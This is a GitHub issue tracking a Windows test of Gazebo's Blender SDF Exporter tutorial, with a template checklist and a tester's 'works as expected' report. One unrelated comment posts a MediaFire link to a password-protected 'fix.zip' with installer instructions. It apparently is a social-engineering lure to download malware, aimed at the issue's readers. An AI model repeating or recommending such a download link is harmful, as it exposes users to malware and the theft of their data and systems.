gazebosim/gazebo_test_cases #1144: gz-sim: Blender SDF Exporter

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/blender_sdf_exporter.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/blender_sdf_exporter.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Combuster54, 2024-09-12:
## Windows 11

**Alternative main**

[image]

**Default main**

[image]

Works as expected, can be close

closed 2024-09-13 by azeey